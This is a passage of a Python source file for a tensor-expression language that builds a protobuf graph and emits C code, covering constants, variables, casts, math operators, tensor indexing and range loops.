        uint64: lambda x: x.uint64_data
    }

    def __init__(self, value):
        """
        :param value: a list, tuple, numpy array, int or float to wrap
        :raises TypeError: if value is none of the above
        """
        # use numpy functionality to convert lists and tuples to arrays
        if type(value) is list:
            array = np.array(value)
        elif type(value) is tuple:
            array = np.array(value)
        elif type(value) is np.ndarray:
            array = value
        elif isinstance(value, six.integer_types) or type(value) is float:
            array = np.array([value])
        else:
            raise TypeError('ConstTensors can wrap lists, tuples, and numpy arrays')
        super(self.__class__, self).__init__(lang.CONST_TENSOR, TensorType.like(array))
        # build up protobuf representation; data is stored flat in C (row-major) order
        flat_data = array.flatten(order='C').tolist()
        # NOTE(review): the list/index lookup below matches DType keys by
        # equality rather than by hash -- presumably because distinct DType
        # instances compare equal; confirm before simplifying to a plain
        # dict lookup.
        vals = list(_ConstTensor.proto_data_lut.values())
        keys = list(_ConstTensor.proto_data_lut.keys())
        proto_data_retrieval = vals[keys.index(self.tensor_type.dtype)]
        proto_data = proto_data_retrieval(self.proto_expr)
        proto_data.extend(flat_data)
        super(self.__class__, self)._register()

    def to_array(self):
        """Return the wrapped constant data as a flat numpy array."""
        vals = list(_ConstTensor.proto_data_lut.values())
        keys = list(_ConstTensor.proto_data_lut.keys())
        proto_data_retrieval = vals[keys.index(self.tensor_type.dtype)]
        proto_data = proto_data_retrieval(self.proto_expr)
        data = np.array(proto_data, dtype=self.dtype.as_numpy())
        return data

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct a _ConstTensor from its protobuf representation."""
        dtype = DType(proto.tensor_type.dtype)
        vals = list(_ConstTensor.proto_data_lut.values())
        keys = list(_ConstTensor.proto_data_lut.keys())
        proto_data_retrieval = vals[keys.index(dtype)]
        proto_data = proto_data_retrieval(proto)
        data = np.array(proto_data, dtype=dtype.as_numpy())
        return _ConstTensor(data)

    def gen_ptr(self):
        """Generate the C declaration for this read-only constant buffer."""
        tipe = self.dtype.as_cstr()
        name = self.name
        elems = self.size
        return string.Template('const ${tipe} ${name}[${elems}]').substitute(locals())

    def gen_c(self):
        # No inline C is generated; the declaration comes from gen_ptr.
        return ''
def position_in(workgroup_shape):
    """
    Set the workgroup shape and obtain the current position within it.

    :param workgroup_shape: an int or an iterable of ints giving the shape
        of the workgroup
    :return: a tensor expression referencing the current workgroup position
    """
    return PositionTensor(workgroup_shape)
class PositionTensor(_TensorExpression, _Readable):
    """
    Expression referring to the current worker position within the workgroup
    shape, exposed as a rank-1 uint32 tensor with one element per dimension.
    """
    def __init__(self, workgroup_shape):
        """
        :param workgroup_shape: an int or an iterable of ints
        :raises TypeError: if the shape is neither
        """
        # accept a bare int as shorthand for a 1-D workgroup shape
        if isinstance(workgroup_shape, six.integer_types):
            self.workgroup_shape = [workgroup_shape]
        else:
            try:
                for elem in workgroup_shape:
                    if not isinstance(elem, six.integer_types):
                        raise TypeError
            except TypeError:
                raise TypeError('workgroup_shape must be an int or an iterable of ints')
            self.workgroup_shape = workgroup_shape
        workgroup_dims = len(self.workgroup_shape)
        tensor_type = TensorType([workgroup_dims], uint32)
        super(self.__class__, self).__init__(lang.POSITION, tensor_type)
        self.proto_expr.uint32_data.extend(self.workgroup_shape)
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct a PositionTensor from its protobuf representation."""
        return PositionTensor(proto.uint32_data)

    def gen_ptr(self):
        """Generate the C declaration for the position array."""
        tipe = self.dtype.as_cstr()
        name = self.name
        elems = self.size
        p = string.Template('${tipe} ${name}[${elems}]').substitute(locals())
        # BUG FIX: the declaration string was computed but never returned,
        # so callers previously received None (every sibling gen_ptr returns
        # its declaration).
        return p

    def gen_c(self):
        """
        Emit C code that unravels the linear ``worker_index`` into
        per-dimension position coordinates (row-major order).
        """
        # workgroup_block_size[i] = number of linear indices spanned by one
        # step along dimension i
        workgroup_block_size = [1]
        for cur_dim in range(self.size-1, 0, -1):
            workgroup_block_size.append(workgroup_block_size[-1]*self.workgroup_shape[cur_dim])
        workgroup_block_size.reverse()
        position_vals = []
        remainder = 'worker_index'
        for cur_block in workgroup_block_size:
            cur_index = '('+remainder+')/'+str(cur_block)
            position_vals.append(cur_index)
            # successive '%' applications strip off the higher dimensions
            remainder = remainder + ' % ' + str(cur_block)
        return 'const uint32_t position['+str(self.size)+'] = {' + _list_to_str(position_vals) + '};\n'
def variable(initial_value, dtype):
    """
    Declare a new variable expression.

    :param initial_value: a numeric constant or scalar expression used to
        initialize the variable
    :param dtype: the DType of the variable
    :return: the variable expression
    :raises TypeError: if initial_value is neither numeric nor a scalar
        expression
    """
    is_numeric = isinstance(initial_value, six.integer_types) or isinstance(initial_value, float)
    if is_numeric:
        return Variable(dtype, _ConstScalar(initial_value))
    if issubclass(initial_value.__class__, Scalar):
        # initialize to zero, then assign the scalar expression
        var = Variable(dtype, _ConstScalar(0))
        var <<= initial_value
        return var
    raise TypeError('Must initialize a variable with a numeric constant or a scalar expression.')
class Variable(Scalar):
    """
    A mutable scalar variable expression; assign with ``var <<= expr``.
    """
    def __init__(self, dtype, intial_const):
        # NOTE(review): parameter name 'intial_const' is a typo for
        # 'initial_const', but it is part of the keyword-call interface and is
        # therefore preserved.
        if not isinstance(intial_const, _ConstScalar):
            raise TypeError('Variables must be initialized with a constant scalar')
        if not isinstance(dtype, DType):
            raise TypeError('dtype must be a DType')
        super(self.__class__, self).__init__(lang.VARIABLE, dtype)
        self.input_exprs = [intial_const]
        super(self.__class__, self)._register()

    def __ilshift__(self, other):
        """Assignment operator: ``var <<= other`` records an assignment expression."""
        _AssignVariable(self, other)
        return self

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct a Variable from its protobuf representation."""
        return Variable(DType(proto.dtype), input_exprs[0])

    def gen_c(self):
        """Emit the C declaration initialized from the wrapped constant."""
        return self.dtype.as_cstr() + ' ' + self.name + ' = ' + self.input_exprs[0].name + ';\n'
def cast(value, dtype):
    """
    Reinterpret a scalar expression as a different data type.

    :param value: the scalar expression to convert
    :param dtype: the target data type
    :return: the converted scalar expression
    """
    return _Cast(dtype, value)
class _Cast(Scalar):
    """
    A scalar type-conversion expression (see the ``cast`` helper).
    """
    def __init__(self, dtype, target):
        if not isinstance(dtype, DType):
            raise TypeError('dtype must be a DType')
        if not issubclass(target.__class__, Scalar):
            raise TypeError('Can only cast scalar expressions. Received ' + str(type(target)) + ': ' +
                            str(target))
        super(self.__class__, self).__init__(lang.CAST, dtype)
        self.input_exprs = [target]
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct a _Cast from its protobuf representation."""
        return _Cast(DType(proto.dtype), input_exprs[0])

    def gen_c(self):
        # relies on C's implicit conversion in the initializing assignment
        return self.dtype.as_cstr() + ' ' + self.name + ' = ' + self.input_exprs[0].name + ';\n'
class _AssignVariable(_Expression):
    """
    Expression assigning a scalar value to a Variable (created by ``<<=``).
    """
    def __init__(self, scalar_expr, value_expr):
        if not isinstance(scalar_expr, Variable):
            raise TypeError('Can only assign to a variable')
        if issubclass(value_expr.__class__, Scalar):
            value = value_expr
        else:
            # wrap plain numbers as constants and cast them to the target type
            value = _ConstScalar(value_expr)
            value = cast(value, scalar_expr.dtype)
        super(self.__class__, self).__init__(lang.ASSIGN_VARIABLE)
        # a non-constant value must already have the variable's exact dtype
        t1 = scalar_expr.proto_expr.dtype
        t2 = value.proto_expr.dtype
        if not t1 == t2:
            t1_str = lang.DType.Name(t1)
            t2_str = lang.DType.Name(t2)
            raise TypeError('cannot assign ' + t2_str + ' to ' + t1_str + ' scalar')
        self.input_exprs = [scalar_expr, value]
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct an _AssignVariable from its protobuf representation."""
        return _AssignVariable(input_exprs[0], input_exprs[1])

    def gen_c(self):
        """Emit the C assignment statement."""
        return self.input_exprs[0].name + ' = ' + self.input_exprs[1].name + ';\n'
class _UnaryMath(Scalar):
    """
    Unary math expression: applies a single C math function or operator to one
    scalar expression, yielding a scalar of the same dtype.
    """
    # maps expression code -> dtype -> C function name / operator
    code_map = {
        lang.ACOS: {lang.FLOAT32: 'acosf', lang.FLOAT64: 'acos'},
        lang.ASIN: {lang.FLOAT32: 'asinf', lang.FLOAT64: 'asin'},
        lang.ATAN: {lang.FLOAT32: 'atanf', lang.FLOAT64: 'atan'},
        lang.COS: {lang.FLOAT32: 'cosf', lang.FLOAT64: 'cos'},
        lang.COSH: {lang.FLOAT32: 'coshf', lang.FLOAT64: 'cosh'},
        lang.SIN: {lang.FLOAT32: 'sinf', lang.FLOAT64: 'sin'},
        lang.SINH: {lang.FLOAT32: 'sinhf', lang.FLOAT64: 'sinh'},
        lang.TAN: {lang.FLOAT32: 'tanf', lang.FLOAT64: 'tan'},
        lang.TANH: {lang.FLOAT32: 'tanhf', lang.FLOAT64: 'tanh'},
        lang.EXP: {lang.FLOAT32: 'expf', lang.FLOAT64: 'exp'},
        lang.LOG: {lang.FLOAT32: 'logf', lang.FLOAT64: 'log'},
        lang.LOG10: {lang.FLOAT32: 'log10f', lang.FLOAT64: 'log10'},
        lang.SQRT: {lang.FLOAT32: 'sqrtf', lang.FLOAT64: 'sqrt'},
        lang.CEIL: {lang.FLOAT32: 'ceilf', lang.FLOAT64: 'ceil'},
        lang.FLOOR: {lang.FLOAT32: 'floorf', lang.FLOAT64: 'floor'},
        lang.ABS: {lang.FLOAT32: 'fabsf', lang.FLOAT64: 'fabs', lang.INT8: 'abs_8',
                   lang.INT16: 'abs_16', lang.INT32: 'abs', lang.INT64: 'labs'},
        lang.NEGATE: {lang.FLOAT32: '-', lang.FLOAT64: '-',
                      lang.INT8: '-', lang.INT16: '-', lang.INT32: '-', lang.INT64: '-'},
        lang.NOT: {lang.FLOAT32: '!', lang.FLOAT64: '!',
                   lang.INT8: '!', lang.INT16: '!', lang.INT32: '!', lang.INT64: '!',
                   lang.UINT8: '!', lang.UINT16: '!', lang.UINT32: '!', lang.UINT64: '!'},
        lang.ISINF: {lang.FLOAT32: 'isinf', lang.FLOAT64: 'isinf'},
        lang.ISFINITE: {lang.FLOAT32: 'isfinite', lang.FLOAT64: 'isfinite'},
        lang.ISNAN: {lang.FLOAT32: 'isnan', lang.FLOAT64: 'isnan'}
    }

    def __init__(self, arg, expr_code):
        """
        :param arg: the scalar expression to transform
        :param expr_code: one of the unary codes present in ``code_map``
        :raises TypeError: if arg is not a scalar expression
        :raises ValueError: if the code or the argument dtype is unsupported
        """
        # Validate the argument is a scalar expression before touching its
        # dtype, so a bad argument raises TypeError instead of AttributeError.
        if not issubclass(arg.__class__, Scalar):
            raise TypeError('Must apply math functions to scalar expressions. Received: ' + str(arg))
        if expr_code not in _UnaryMath.code_map:
            # BUG FIX: the message previously lacked a leading space and read
            # e.g. "ACOSis an invalid unary math code."
            raise ValueError(lang.ExpressionCode.Name(expr_code) + ' is an invalid unary math code.')
        if arg.dtype.proto_dtype not in _UnaryMath.code_map[expr_code]:
            raise ValueError(lang.DType.Name(arg.dtype.proto_dtype) +
                             ' arguments not supported for unary math function ' +
                             lang.ExpressionCode.Name(expr_code))
        super(self.__class__, self).__init__(expr_code, arg.dtype)
        self.input_exprs = [arg]
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct a _UnaryMath from its protobuf representation."""
        return _UnaryMath(input_exprs[0], proto.code)

    def gen_c(self):
        """Emit the C assignment applying the mapped function to the input."""
        func_string = _UnaryMath.code_map[self.proto_expr.code][self.proto_expr.dtype]
        return self.dtype.as_cstr() + ' ' + self.name + ' = ' + func_string + '(' + self.input_exprs[0].name + ');\n'
# Thin public wrappers over _UnaryMath, one per supported unary operation.
def arccos(x):
    """Arc cosine of scalar expression ``x``."""
    return _UnaryMath(x, lang.ACOS)
def arcsin(x):
    """Arc sine of scalar expression ``x``."""
    return _UnaryMath(x, lang.ASIN)
def arctan(x):
    """Arc tangent of scalar expression ``x``."""
    return _UnaryMath(x, lang.ATAN)
def cos(x):
    """Cosine of scalar expression ``x``."""
    return _UnaryMath(x, lang.COS)
def cosh(x):
    """Hyperbolic cosine of scalar expression ``x``."""
    return _UnaryMath(x, lang.COSH)
def sin(x):
    """Sine of scalar expression ``x``."""
    return _UnaryMath(x, lang.SIN)
def sinh(x):
    """Hyperbolic sine of scalar expression ``x``."""
    return _UnaryMath(x, lang.SINH)
def tan(x):
    """Tangent of scalar expression ``x``."""
    return _UnaryMath(x, lang.TAN)
def tanh(x):
    """Hyperbolic tangent of scalar expression ``x``."""
    return _UnaryMath(x, lang.TANH)
def exp(x):
    """Exponential of scalar expression ``x``."""
    return _UnaryMath(x, lang.EXP)
def log(x):
    """Natural logarithm of scalar expression ``x``."""
    return _UnaryMath(x, lang.LOG)
def log10(x):
    """Base-10 logarithm of scalar expression ``x``."""
    return _UnaryMath(x, lang.LOG10)
def sqrt(x):
    """Square root of scalar expression ``x``."""
    return _UnaryMath(x, lang.SQRT)
def ceil(x):
    """Ceiling of scalar expression ``x``."""
    return _UnaryMath(x, lang.CEIL)
def floor(x):
    """Floor of scalar expression ``x``."""
    return _UnaryMath(x, lang.FLOOR)
def absolute(x):
    """Absolute value of scalar expression ``x``."""
    return _UnaryMath(x, lang.ABS)
def logical_not(x):
    """Logical negation of scalar expression ``x``."""
    return _UnaryMath(x, lang.NOT)
def isinf(x):
    """True where scalar expression ``x`` is infinite."""
    return _UnaryMath(x, lang.ISINF)
def isfinite(x):
    """True where scalar expression ``x`` is finite."""
    return _UnaryMath(x, lang.ISFINITE)
def isnan(x):
    """True where scalar expression ``x`` is NaN."""
    return _UnaryMath(x, lang.ISNAN)
class _Limits(Scalar):
    """
    A floating point limit constant (min/max/epsilon) mapped to the
    corresponding C limit macro.
    """
    # maps expression code -> dtype -> C limit macro name
    code_map = {
        lang.MIN_VALUE: {lang.FLOAT32: 'FLT_MIN', lang.FLOAT64: 'DBL_MIN'},
        lang.MAX_VALUE: {lang.FLOAT32: 'FLT_MAX', lang.FLOAT64: 'DBL_MAX'},
        lang.EPSILON: {lang.FLOAT32: 'FLT_EPSILON', lang.FLOAT64: 'DBL_EPSILON'},
    }

    def __init__(self, expr_code, t):
        """
        :param expr_code: one of MIN_VALUE, MAX_VALUE, EPSILON
        :param t: the DType the limit applies to (float32 or float64)
        :raises TypeError: if t is not a DType
        :raises ValueError: if the code or dtype is unsupported
        """
        if expr_code not in _Limits.code_map:
            # BUG FIX: the message previously lacked a leading space and read
            # e.g. "MIN_VALUEis an invalid limits code."
            raise ValueError(lang.ExpressionCode.Name(expr_code) + ' is an invalid limits code.')
        if not issubclass(t.__class__, DType):
            raise TypeError('Must apply limits functions to dtypes. Received: ' + str(t))
        if t.as_proto() not in _Limits.code_map[expr_code]:
            raise ValueError(str(t) +
                             ' arguments not supported for limits function ' +
                             lang.ExpressionCode.Name(expr_code))
        super(self.__class__, self).__init__(expr_code, t)
        # the expression's name is the macro itself, so references to this
        # expression emit the macro directly
        self.name = _Limits.code_map[expr_code][t.as_proto()]
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct a _Limits from its protobuf representation."""
        return _Limits(proto.code, DType(proto.dtype))

    def gen_c(self):
        # no statement needed; the macro name stands in wherever referenced
        return ''
def min_value(dtype):
    """
    Smallest normalized positive value representable by a floating point type.

    :param dtype: the floating point DType
    :return: a limit expression for the minimum value of ``dtype``
    """
    return _Limits(lang.MIN_VALUE, dtype)
def max_value(dtype):
    """
    Largest value representable by a floating point type.

    :param dtype: the floating point DType
    :return: a limit expression for the maximum value of ``dtype``
    """
    return _Limits(lang.MAX_VALUE, dtype)
def epsilon(dtype):
    """
    Difference between 1.0 and the next representable value of a floating
    point type.

    :param dtype: the floating point DType
    :return: a limit expression for the epsilon of ``dtype``
    """
    return _Limits(lang.EPSILON, dtype)
class _BinaryMath(Scalar):
    """
    Binary math expression: combines two scalar expressions into a third of
    the same dtype.
    """
    # maps expression code -> dtype -> C code generator (callable taking the
    # two operand name strings and returning the C expression string)
    code_map = {
        lang.ADD: {},
        lang.SUBTRACT: {},
        lang.MULTIPLY: {},
        lang.DIVIDE: {},
        lang.MODULO: {},
        lang.EQUAL: {},
        lang.NOTEQUAL: {},
        lang.LESS: {},
        lang.LESS_EQ: {},
        lang.GREATER: {},
        lang.GREATER_EQ: {},
        lang.MIN: {},
        lang.MAX: {},
        lang.AND: {},
        lang.OR: {},
        lang.POW: {lang.FLOAT32: lambda x, y: 'powf('+x+','+y+')',
                   lang.FLOAT64: lambda x, y: 'pow('+x+','+y+')'},
        lang.ATAN2: {lang.FLOAT32: lambda x, y: 'atan2f('+x+','+y+')',
                     lang.FLOAT64: lambda x, y: 'atan2('+x+','+y+')'},
    }
    # Populate the generic operators for every supported dtype.  The lambdas
    # only reference their own parameters, so there is no late-binding issue.
    for cur_type in supported_types:
        code_map[lang.MIN][cur_type.proto_dtype] = lambda x, y: '((('+x+')<('+y+'))?('+x+'):('+y+'))'
        code_map[lang.MAX][cur_type.proto_dtype] = lambda x, y: '((('+x+')>('+y+'))?('+x+'):('+y+'))'
        code_map[lang.ADD][cur_type.proto_dtype] = lambda x, y: '(' + x + ' + ' + y + ')'
        code_map[lang.SUBTRACT][cur_type.proto_dtype] = lambda x, y: '(' + x + ' - ' + y + ')'
        code_map[lang.MULTIPLY][cur_type.proto_dtype] = lambda x, y: '(' + x + ' * ' + y + ')'
        code_map[lang.DIVIDE][cur_type.proto_dtype] = lambda x, y: '(' + x + ' / ' + y + ')'
        code_map[lang.MODULO][cur_type.proto_dtype] = lambda x, y: '(' + x + ' % ' + y + ')'
        code_map[lang.EQUAL][cur_type.proto_dtype] = lambda x, y: '(' + x + ' == ' + y + ')'
        code_map[lang.NOTEQUAL][cur_type.proto_dtype] = lambda x, y: '(' + x + ' != ' + y + ')'
        code_map[lang.LESS][cur_type.proto_dtype] = lambda x, y: '(' + x + ' < ' + y + ')'
        code_map[lang.LESS_EQ][cur_type.proto_dtype] = lambda x, y: '(' + x + ' <= ' + y + ')'
        code_map[lang.GREATER][cur_type.proto_dtype] = lambda x, y: '(' + x + ' > ' + y + ')'
        code_map[lang.GREATER_EQ][cur_type.proto_dtype] = lambda x, y: '(' + x + ' >= ' + y + ')'
        code_map[lang.AND][cur_type.proto_dtype] = lambda x, y: '(' + x + ' && ' + y + ')'
        code_map[lang.OR][cur_type.proto_dtype] = lambda x, y: '(' + x + ' || ' + y + ')'
    # floating point modulo needs fmod/fmodf instead of the C '%' operator
    code_map[lang.MODULO][float32.proto_dtype] = lambda x, y: 'fmodf('+x+','+y+')'
    code_map[lang.MODULO][float64.proto_dtype] = lambda x, y: 'fmod('+x+','+y+')'

    def __init__(self, arg1, arg2, expr_code):
        """
        :param arg1: first operand (scalar expression or Python number)
        :param arg2: second operand (scalar expression or Python number)
        :param expr_code: one of the binary codes present in ``code_map``
        :raises TypeError: if operands are not scalar-compatible or both constant
        :raises ValueError: for an invalid code or unsupported operand dtype
        """
        if expr_code not in list(_BinaryMath.code_map.keys()):
            raise ValueError('Invalid binary math code')
        code_str = lang.ExpressionCode.Name(expr_code)
        # first try to wrap args as constants
        try:
            arg1_wrapped = _ConstScalar(arg1)
        except TypeError:
            arg1_wrapped = arg1
        try:
            arg2_wrapped = _ConstScalar(arg2)
        except TypeError:
            arg2_wrapped = arg2
        # throw error if received a non-expression that could not be wrapped as constant
        if not issubclass(arg1_wrapped.__class__, _Expression):
            raise TypeError('Cannot apply ' + code_str + ' to first non-expression argument:\n' + str(arg1_wrapped))
        if not issubclass(arg2_wrapped.__class__, _Expression):
            raise TypeError('Cannot apply ' + code_str + ' to second non-expression argument:\n' + str(arg2_wrapped))
        # throw error if received a non-scalar expression
        if not issubclass(arg1_wrapped.__class__, Scalar):
            raise TypeError('First argument to ' + code_str + ' must be a scalar expression, got:\n' + str(arg1_wrapped))
        if not issubclass(arg2_wrapped.__class__, Scalar):
            raise TypeError('Second argument to ' + code_str + ' must be a scalar expression, got:\n' + str(arg2_wrapped))
        # cast constants according to the type of the other input
        arg1_is_constant = type(arg1_wrapped) == _ConstScalar
        arg2_is_constant = type(arg2_wrapped) == _ConstScalar
        if not arg1_is_constant and not arg2_is_constant:
            arg1_expr = arg1_wrapped
            arg2_expr = arg2_wrapped
        elif not arg1_is_constant and arg2_is_constant:
            arg1_expr = arg1_wrapped
            arg2_expr = cast(arg2_wrapped, arg1_wrapped.dtype)
        elif arg1_is_constant and not arg2_is_constant:
            arg1_expr = cast(arg1_wrapped, arg2_wrapped.dtype)
            arg2_expr = arg2_wrapped
        else:
            raise TypeError('Cannot apply binary operator to two constants.')
        # after constant casting, both operand dtypes must match exactly
        t1 = arg1_expr.proto_expr.dtype
        t2 = arg2_expr.proto_expr.dtype
        if not t1 == t2:
            t1_str = lang.DType.Name(t1)
            t2_str = lang.DType.Name(t2)
            raise TypeError('arg1 type (' + t1_str + ') must be the same as arg2 type (' + t2_str + ')')
        if arg1_expr.dtype.proto_dtype not in list(_BinaryMath.code_map[expr_code].keys()):
            raise ValueError(lang.DType.Name(arg1_expr.dtype.proto_dtype) +
                             ' arguments not supported for binary math function ' +
                             lang.ExpressionCode.Name(expr_code))
        super(self.__class__, self).__init__(expr_code, arg1_expr.dtype)
        self.input_exprs = [arg1_expr, arg2_expr]
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct a _BinaryMath from its protobuf representation."""
        return _BinaryMath(input_exprs[0], input_exprs[1], proto.code)

    def gen_c(self):
        """Emit the C assignment built from the mapped operator generator."""
        func = _BinaryMath.code_map[self.proto_expr.code][self.dtype.proto_dtype]
        func_str = func(self.input_exprs[0].name, self.input_exprs[1].name)
        return self.dtype.as_cstr() + ' ' + self.name + ' = ' + func_str + ';\n'
# Thin public wrappers over _BinaryMath, one per supported binary operation.
def minimum(x, y):
    """Elementwise minimum of scalar expressions ``x`` and ``y``."""
    return _BinaryMath(x, y, lang.MIN)
def maximum(x, y):
    """Elementwise maximum of scalar expressions ``x`` and ``y``."""
    return _BinaryMath(x, y, lang.MAX)
def power(x, y):
    """``x`` raised to the power ``y``."""
    return _BinaryMath(x, y, lang.POW)
def arctan2(x, y):
    """Two-argument arc tangent of ``x`` and ``y``."""
    return _BinaryMath(x, y, lang.ATAN2)
def logical_and(x, y):
    """Logical conjunction of ``x`` and ``y``."""
    return _BinaryMath(x, y, lang.AND)
def logical_or(x, y):
    """Logical disjunction of ``x`` and ``y``."""
    return _BinaryMath(x, y, lang.OR)
class LocalTensor(_TensorExpression, _Readable, _Writable):
    """
    A readable and writable worker-local tensor, initialized from a constant
    tensor (see the ``zeros``/``ones`` helpers).
    """
    def __init__(self, initial_value):
        if type(initial_value) is not _ConstTensor:
            raise TypeError('Tensors must be initialized by ConstTensors')
        super(self.__class__, self).__init__(lang.TENSOR, initial_value.tensor_type)
        self.input_exprs = [initial_value]
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct a LocalTensor from its protobuf representation."""
        return LocalTensor(input_exprs[0])

    def gen_ptr(self):
        """Generate the (writable) C declaration for this local buffer."""
        tipe = self.dtype.as_cstr()
        name = self.name
        elems = self.size
        return string.Template('${tipe} ${name}[${elems}]').substitute(locals())

    def gen_c(self):
        """Emit the C declaration initialized from the constant tensor."""
        return self.gen_ptr() + ' = ' + self.input_exprs[0].name + ';\n'
def zeros(shape, dtype):
    """
    Create a worker-local tensor whose elements all start at zero.

    :param shape: the tensor shape
    :param dtype: the tensor element type
    :return: the tensor expression
    """
    initializer = _ConstTensor(np.zeros(shape, dtype=DType(dtype).as_numpy()))
    return LocalTensor(initializer)
def ones(shape, dtype):
    """
    Create a worker-local tensor whose elements all start at one.

    :param shape: the tensor shape
    :param dtype: the tensor element type
    :return: the tensor expression
    """
    initializer = _ConstTensor(np.ones(shape, dtype=DType(dtype).as_numpy()))
    return LocalTensor(initializer)
def _check_index(target_expr, index_expr):
    """
    Validate an index used to address elements of ``target_expr``.

    :param target_expr: the tensor being indexed
    :param index_expr: the index, either an expression or a Python number
    :return: the index, wrapped as an expression if it was a plain number
    :raises TypeError: if the index is not scalar-valued
    :raises IndexError: if a constant index is statically out of bounds
    """
    if issubclass(index_expr.__class__, _Expression):
        index = index_expr
    else:
        index = _ConstScalar(index_expr)
    # BUG FIX: compare with '==' instead of 'is' -- proto enum values are
    # plain ints, and identity comparison only works by accident of CPython
    # small-int caching.
    if index.proto_expr.dtype == lang.UNDEFINED_TYPE:
        raise TypeError('Can only index with a scalar.')
    if type(index) is _ConstScalar:
        # constant indices can be bounds-checked at definition time
        if target_expr.size <= index.value() or index.value() < 0:
            raise IndexError('Index out of bounds.')
    return index
class _AssignTensor(_Expression):
    """
    Expression for assigning a scalar value to one element of a writable tensor.
    """
    def __init__(self, tensor_expr, index_expr, value_expr):
        super(self.__class__, self).__init__(lang.ASSIGN_TENSOR)
        if not issubclass(tensor_expr.__class__, _Writable):
            raise TypeError('Can only assign to writable tensors.')
        index = _check_index(tensor_expr, index_expr)
        # try to wrap value as an expression if it's not
        if issubclass(value_expr.__class__, _Expression):
            value = value_expr
        else:
            value = _ConstScalar(value_expr)
            value = cast(value, tensor_expr.dtype)
        # make sure that value is same type as tensor
        t1 = tensor_expr.proto_expr.tensor_type.dtype
        t2 = value.proto_expr.dtype
        if not t1 == t2:
            t1_str = lang.DType.Name(t1)
            t2_str = lang.DType.Name(t2)
            raise TypeError('cannot assign ' + t2_str + ' to ' + t1_str + ' tensor')
        self.input_exprs = [tensor_expr, index, value]
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct an _AssignTensor from its protobuf representation."""
        return _AssignTensor(input_exprs[0], input_exprs[1], input_exprs[2])

    def gen_c(self):
        """Emit the C element-assignment statement."""
        return self.input_exprs[0].name + '[' + self.input_exprs[1].name + '] = ' + self.input_exprs[2].name + ';\n'
class _ReadTensor(Scalar):
    """
    Expression for reading one element of a readable tensor as a scalar.
    """
    def __init__(self, tensor_expr, index_expr):
        if not issubclass(tensor_expr.__class__, _Readable):
            raise TypeError('Can only index a readable tensor.')
        index = _check_index(tensor_expr, index_expr)
        super(self.__class__, self).__init__(lang.READ_TENSOR, tensor_expr.dtype)
        self.input_exprs = [tensor_expr, index]
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct a _ReadTensor from its protobuf representation."""
        return _ReadTensor(input_exprs[0], input_exprs[1])

    def gen_c(self):
        """Emit the C assignment reading the indexed element."""
        return self.dtype.as_cstr() + ' ' + self.name + ' = ' + self.input_exprs[0].name + '['+self.input_exprs[1].name+'];\n'
def arange(start, stop=None, step=None):
    """
    Create an iterator to iterate over a range

    :param start: The starting point in the iterator
    :param stop: The stopping point in the iterator
    :param step: The iterator step size
    :return: None

    :Example:

    usage for accumulating a variable to 10::

        accum = variable(0, uint64)
        for i in arange(10):
            accum <<= accum + 1
    """
    # single-argument form: arange(stop) iterates from 0
    if stop is None:
        start_inferred = 0
        stop_inferred = start
    else:
        start_inferred = start
        stop_inferred = stop
    if step is None:
        step_inferred = 1
    else:
        step_inferred = step
    # try to cast all non-expressions as constants
    input_exprs = []
    first_type = None
    for val in [start_inferred, stop_inferred, step_inferred]:
        if issubclass(val.__class__, _Expression):
            input_exprs.append(val)
            # the dtype of the first expression argument wins
            if first_type is None:
                first_type = val.dtype
        else:
            input_exprs.append(_ConstScalar(val))
    # all arguments were plain numbers: infer the type from 'start'
    if first_type is None:
        first_type = _ConstScalar(start).dtype
    # cast all constants as the first dtype
    cast_exprs = []
    for expr in input_exprs:
        if type(expr) is _ConstScalar:
            cast_exprs.append(cast(expr, first_type))
        else:
            cast_exprs.append(expr)
    # the loop index variable shares the inferred dtype
    index = variable(0, first_type)
    return _Range(index, cast_exprs[0], cast_exprs[1], cast_exprs[2])
class _Range(_Expression, six.Iterator):
    """
    A range expression usable as a Python iterator; yields its index variable
    exactly once, then emits an _EndRange and stops (so a Python ``for`` over
    it records the loop body once between RANGE and ENDRANGE).
    """
    def __init__(self, index, start, stop, step):
        # tracks whether the single iteration has been produced
        self.block_done = False
        first_type = index.dtype
        for expr in [start, stop, step]:
            if expr.dtype != first_type:
                raise TypeError('All input expressions must have the same type.')
        super(self.__class__, self).__init__(lang.RANGE)
        self.input_exprs = [index, start, stop, step]
        super(self.__class__, self)._register()

    def __iter__(self):
        return self

    def __next__(self):
        if not self.block_done:
            self.block_done = True
            # yield the loop index variable to the caller's 'for' body
            return self.input_exprs[0]
        else:
            # close the loop in the expression DAG before stopping
            _EndRange()
            raise StopIteration

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct a _Range from its protobuf representation."""
        return _Range(*input_exprs)

    def gen_c(self):
        """
        Emit the C for-loop header; the condition handles both positive and
        negative step directions.
        """
        index_name = self.input_exprs[0].name
        start_name = self.input_exprs[1].name
        stop_name = self.input_exprs[2].name
        step_name = self.input_exprs[3].name
        for_string = 'for(${index_name} = ${start_name}; ' \
                     '((${index_name} < ${stop_name})&&(${step_name}>0)) || ' \
                     '((${index_name} > ${stop_name})&&(${step_name}<0)); ' \
                     '${index_name}+=${step_name}){\n'
        return string.Template(for_string).substitute(locals())
class _EndRange(_Expression):
    """
    Marker expression closing a _Range loop body.
    """
    def __init__(self):
        super(self.__class__, self).__init__(lang.ENDRANGE)
        super(self.__class__, self)._register()

    @staticmethod
    def from_proto(proto, input_exprs):
        """Reconstruct an _EndRange from its protobuf representation."""
        return _EndRange()

    def gen_c(self):
        # closes the for-loop opened by _Range.gen_c
        return '}\n'
def if_(condition):
    """
    Conditional execution; must be used as part of a ``with`` block.

    :param condition: the condition under which the body of the ``with``
        block executes

    :Example:

